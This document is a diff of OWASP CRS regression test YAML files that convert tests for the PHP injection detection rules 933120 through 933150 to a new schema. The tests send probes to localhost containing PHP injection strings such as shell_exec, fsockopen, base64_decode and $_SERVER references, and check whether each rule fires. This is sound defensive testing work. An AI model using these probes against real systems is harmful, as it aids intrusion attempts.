expect_ids: [933120] + - test_id: 6 desc: "PHP Injection Attack: Configuration Directive: mbstring.regex_stack_limit" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=mbstring.regex_stack_limit%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=mbstring.regex_stack_limit%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 7 desc: "PHP Injection Attack: Configuration Directive: precision" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=precision%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=precision%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 8 desc: "PHP Injection Attack: Configuration Directive: smtp" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=smtp%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=smtp%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 9 desc: "PHP Injection Attack: Configuration Directive: unserialize_max_depth" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=unserialize_max_depth%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=unserialize_max_depth%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml index f2d3f9436..653bbab73 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml @@ -1,103 +1,101 @@ --- meta: author: "csanders-git, azurit" - description: Tests functionality of 933130 - enabled: true - name: 933130.yaml +rule_id: 933130 tests: - - test_title: 933130-1 + - test_id: 1 desc: Basic Request nothing should trigger stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933130" - - test_title: 933130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933130] + - test_id: 2 desc: Trigger a basic request stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_SERVER['test'];" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_SERVER['test'];" + version: "HTTP/1.1" + output: + log: + expect_ids: [933130] + - test_id: 3 desc: Non-Server Request stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_SE%20RVER['test'];" - version: "HTTP/1.1" - output: - no_log_contains: id "933130" - - test_title: 933130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_SE%20RVER['test'];" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933130] + - test_id: 4 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53ERVER['test'];" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53ERVER['test'];" + version: "HTTP/1.1" + output: + log: + expect_ids: [933130] + - test_id: 5 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?%24_COOKIE=value;" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?%24_COOKIE=value;" + version: "HTTP/1.1" + output: + log: + expect_ids: [933130] + - test_id: 6 desc: SERVER index listed with obfuscated SERVER stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53%20ERVER['request_uri'];" - version: "HTTP/1.1" - output: - no_log_contains: id "933130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53%20ERVER['request_uri'];" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933130] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml index 6bc3f6ca6..55fbb3c87 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml @@ -1,55 +1,53 @@ --- meta: author: "csanders-git, azurit" - description: Tests functionality of stricter sibling 933131 - enabled: true - name: 933131.yaml +rule_id: 933131 tests: - - test_title: 933131-1 + - test_id: 1 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53ERVER['test'];" - version: "HTTP/1.1" - output: - no_log_contains: id "933131" - - test_title: 933131-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53ERVER['test'];" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933131] + - test_id: 2 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?%24_COOKIE=value;" - version: "HTTP/1.1" - output: - no_log_contains: id "933131" - - test_title: 933131-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?%24_COOKIE=value;" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933131] + - test_id: 3 desc: SERVER index listed with obfuscated SERVER stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53%20ERVER['REQUEST_URI'];" - version: "HTTP/1.1" - output: - log_contains: id "933131" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53%20ERVER['REQUEST_URI'];" + version: "HTTP/1.1" + output: + log: + expect_ids: [933131] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml index 9db6f3c0d..7d50b91e3 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml @@ -1,25 +1,23 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 933140.yaml +rule_id: 933140 tests: - - test_title: 933140-1 + - test_id: 1 desc: "PHP Injection Attack: I/O Stream" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=php://stdout" - version: HTTP/1.0 - output: - log_contains: id "933140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=php://stdout" + version: HTTP/1.0 + output: + log: + expect_ids: [933140] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml index b72c81fc4..c05319b5f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml @@ -1,573 +1,570 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 933150.yaml +rule_id: 933150 tests: - - test_title: 933150-1 + - test_id: 1 desc: phpinfo stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/phpinfo" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/phpinfo" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 2 desc: base64_decode stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/base64_decode" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/base64_decode" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 3 desc: base64_decode mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?base64_deCOde" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?base64_deCOde" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 4 desc: bzdecompress stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=bzdecomprEss" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=bzdecomprEss" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 5 desc: call_user_func stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOcall_user_func" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOcall_user_func" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 6 desc: fsockopen stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOfsockopen" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOfsockopen" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 7 desc: gzdecode stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOgzdecode" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOgzdecode" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 8 desc: GzInFlAtE stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOGzInFlAtE" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOGzInFlAtE" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 9 desc: pHpInFo mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOpHpInFo" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOpHpInFo" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 10 desc: gzuncompress stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?I%20don%27t%20like%20gzuncompress" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?I%20don%27t%20like%20gzuncompress" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 11 desc: fsockopen stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/get?bar=pfsockopen%28%27foo%27%2C%2025%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/get?bar=pfsockopen%28%27foo%27%2C%2025%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 12 desc: posix_getpwuiD stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?bar=posix_getpwuiD%28%27foo%27%2C%2025%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?bar=posix_getpwuiD%28%27foo%27%2C%2025%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 13 desc: shell_exec stages: - - stage: - input: - data: Shell%5fexec=bla - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-14 + - input: + data: Shell%5fexec=bla + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 14 desc: ZlIb_DeCoDe stages: - - stage: - input: - data: ZlIb%5fDeCoDe=bla - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-15 + - input: + data: ZlIb%5fDeCoDe=bla + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 15 desc: get_defined_functions stages: - - stage: - input: - data: foo=get_defined_functions%28%29%5B0%5D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-16 + - input: + data: foo=get_defined_functions%28%29%5B0%5D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 16 desc: get_defined_vars stages: - - stage: - input: - data: foo=get_defined_vars%28%29%5B0%5D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-17 + - input: + data: foo=get_defined_vars%28%29%5B0%5D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 17 desc: | PHP function call in body, mixed case. payload: curl_iNit() stages: - - stage: - input: - data: foo=curl_iNit%28%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-18 + - input: + data: foo=curl_iNit%28%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 18 desc: | PHP function call in body payload: posix_getegid() stages: - - stage: - input: - data: posix_getegid%28%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-19 + - input: + data: posix_getegid%28%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 19 desc: | PHP function call in body, mixed case payload: Print_r() stages: - - stage: - input: - data: x=Print_r%28%20%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/print_r" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-20 + - input: + data: x=Print_r%28%20%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/print_r" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 20 desc: | PHP function call in body. payload: strrev() stages: - - stage: - input: - data: x=strrev%28%20%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/strrev" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-21 + - input: + data: x=strrev%28%20%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/strrev" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 21 desc: | False Positive test payload: the files (yep) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20files%20%28yep%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 